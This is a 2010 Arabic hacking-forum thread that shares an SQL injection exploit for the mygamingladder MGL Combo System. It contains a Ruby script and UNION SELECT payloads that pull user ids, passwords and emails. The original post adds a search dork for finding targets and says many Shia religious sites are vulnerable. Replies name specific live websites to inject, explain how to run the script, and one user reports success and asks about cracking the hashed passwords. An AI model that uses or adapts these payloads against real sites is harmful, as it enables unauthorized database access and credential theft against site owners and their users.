سكربت mygamingladder MGL Combo System مصاب مواقع شيعيه كثيره

Marine · 04-11-2010, 12:09 AM

كود PHP:


			
# Title: mygamingladder MGL Combo System <= 7.5 SQL injection

# EDB-ID: 12135

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Easy Laster

# Published: 2010-04-10

# Verified: no

# Download Exploit Code

# Download N/A



view source

print?

----------------------------Information------------------------------------------------

+Name : mygamingladder MGL Combo System <= 7.5 SQL injection Vulnerability & SQL injection Exploit

+Autor : Easy Laster

+Date   : 10.04.2010

+Script  : mygamingladder MGL Combo System <= 7.5

+Download : ------------------

+Demo : http://www.mygamingladder.com/upgrade/combo/

+Price : 120$

+Language : PHP

+Discovered by Easy Laster

+Security Group 4004-Security-Project 4004-security-project.com

+Greetz to Team-Internet ,Underground Agents

+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,

Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,

N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.

 

---------------------------------------------------------------------------------------

                                                                                      

 ___ ___ ___ ___                         _ _           _____           _         _  

| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_

|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|

  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 

                                              |___|                 |___|           

 

 

----------------------------------------------------------------------------------------

+Vulnerability : http://www.site.com/game/news.php?newsid=

 

 

+Exploitable   : http://www.site.com/game/news.php?newsid=1'/**/UNION/**/SELECT+1,

concat(id,0x3a,pass,0x3a,email),3,4/**/from/**/users/**/WHERE/**/id=1--+

 

 

-----------------------------------------------------------------------------------------

 

#Exploit

 

#!/usr/bin/ruby

#4004-security-project.com

#Discovered and vulnerability by Easy Laster

print "

#########################################################

#            4004-Security-Project                      #

#########################################################

#             mygamingladder MGL Combo System 7.5       #

#                          Exploit                      #

#                     Using Host+Path                   #

#                     www.demo.de /forum/               #

#                         Easy Laster                   #

#########################################################

"

require 'net/http'

print "#########################################################"

print "\nEnter host name (site.com)->"

host=gets.chomp

print "#########################################################"

print "\nEnter script path (/forum/)->"

path=gets.chomp

print "\n#########################################################"

begin

dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"

http = Net::HTTP.new(host, 80)

resp= http.get(path+dir)

print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"

http = Net::HTTP.new(host, 80)

resp= http.get(path+dir)

print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]

dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"

http = Net::HTTP.new(host, 80)

resp= http.get(path+dir)

print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]

print "\n#########################################################"

rescue

print "\nExploit failed"

end

الدورك

كود:

inurl:news.php?newsid=

لا وصيكم بالتنتيف

مواقع شيعيه حسينيه مركبته كثيير

تحياتي يزيد العتيبي

MOON14 · 04-11-2010, 12:28 AM

أخوي طبق لنا على موقع لأني جربت على مواقع كثيرة ما نجحت
ولك جزيل الشكر

Marine · 04-11-2010, 12:30 AM

لا تحط الاستغلال الموجود حاول انك تكتبه يدوي

MOON14 · 04-11-2010, 12:30 AM

طبق على هذا
http://www.noaim.net/news.php?newsid=1909
جريت ما نجح
وشكرا

MOON14 · 04-11-2010, 12:31 AM

كتيت ما نجح أخوي
ممكن تكتبه لنا من جديد

Marine · 04-11-2010, 12:36 AM

مصاب

http://www.noaim.net/news.php?newsid=1909'

جرب خش ورح تشوف ذ

MOON14 · 04-11-2010, 12:39 AM

http://www.noaim.net/news.php?newsid...ERE/**/id=1--+

ما ظهر شيئ أخوي شوفي لي حل

MOON14 · 04-11-2010, 12:49 AM

أخوي عططني موقع أنت طبقت عليه ونجح
خلينا نشوف كيف الحقنة تنكتب
شكرا

ehabamr · 04-11-2010, 05:31 AM

مشكور يايزيد

Marine · 04-11-2010, 05:41 AM

ياقمر احقن انت

http://www.abather.net/news.php?newsid=1041

ايهاب منور الموضوع

ehabamr · 04-11-2010, 06:06 AM

اخى الكريم يزيد اولا الف شكر على المجهود

ثانيا ارجو منك ان تشرح لى كيف استطيع استخدام الثغره

استخدام صحيح واعتذر ان كنت سوف ااخذ من وقتك ولكن ارجو المعذره

لتعم الفائده على الجميع

اشكرك مره اخرى

ايهاب

H3x HaCkeR · 04-11-2010, 07:55 AM

[align=center]^

لازم تسسطب برنامج ترجمة لغة الربي ruby بعدها خش للدوس

\cd

وبعدها

cd ruby

الحين بتخش على مجلد الربي ruby

اجفظ الثغرة بامتداد rb ونسميها vbspiders

نكتب

ruby vbspiders.rb

انتر والسلام عليكم

وتمت الترجمة :$[/align]

ehabamr · 04-11-2010, 08:10 AM

اخى الكريم انا فعلا عملت كده والنتيجه كانت

#
################################################## #######
# mygamingladder MGL Combo System 7.5 #
# Exploit #
# Using Host+Path #
# www.demo.de /forum/ #
# Easy Laster #
################################################## #######

صح اريد التطبيق

Using Host+Path
www.demo.de /forum/
#

Marine · 04-11-2010, 02:18 PM

ماقصر معك الاخ

تحط البيانات هنا

حقت الموقع

Using Host+Path
www.demo.de /forum/
#

Art design · 04-12-2010, 04:48 AM

نجح 100% بارك الله فيك لكن يوجد مشكل الباس المشفر ممكن موقع معتمد ؟؟

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
كما وعدتكم موسوعه كبيره لاميلات كثيره هديه لعيونكم	KOOBAN	Hackers Showoff	78	10-08-2010 05:58 PM
مواقع كثيره للمبتدئين للتدرب ^_*	GoLdeN-z3r0	SQL قواعد البيانات	8	08-22-2010 01:17 AM
على الجميع المبادره لقصف هذه المواقع واكمال الحقن مواقع كبيره ومشهوره	NEVER HaCKEr	SQL قواعد البيانات	5	11-23-2009 07:04 PM